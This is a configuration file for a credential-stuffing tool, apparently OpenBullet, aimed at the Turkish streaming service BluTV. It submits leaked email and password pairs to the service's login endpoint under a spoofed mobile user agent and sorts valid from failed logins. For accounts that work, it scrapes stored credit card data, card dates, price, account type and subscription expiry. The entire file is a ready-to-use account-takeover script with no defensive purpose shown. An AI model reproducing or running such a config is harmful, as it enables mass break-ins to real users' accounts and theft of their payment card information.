[SETTINGS]
{
  "Name": "Blutv",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-07T11:24:54.9682244+02:00",
  "AdditionalInfo": "",
  "Author": "Acemy#7578",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.blutv.com.tr/actions/account/login" 
  CONTENT "password=<PASS>&platform=com.blu.lama&remember=true&segment=default&username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: BluTV/2 CFNetwork/974.2.1 Darwin/18.0.0" 
  HEADER "Authorization: Bearer (null)" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"ok\"" 
  KEYCHAIN Failure OR 
    KEY "ERRORS.WRONG_USERNAME_OR_PASSWORD" 

PARSE "<SOURCE>" JSON "AccountState" -> CAP "AccountState" 

PARSE "<SOURCE>" LR "CreditCard\":" ",\"" -> VAR "CreditCard" 

PARSE "<SOURCE>" JSON "CreditCardDate" -> VAR "CreditCard2" 

PARSE "<CreditCard> <CreditCard2>" LR "" "" -> CAP "CC" 

PARSE "<SOURCE>" LR "\"Price\":" ",\"" -> CAP "Price" 

PARSE "<SOURCE>" LR "AccountType\":\"" "\"," -> CAP "Account Type" 

PARSE "<SOURCE>" JSON "ExpireDate" -> CAP "Expire Date" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<AccountState>" Contains "Canceled" 
    KEY "<AccountState>" Contains "None" 

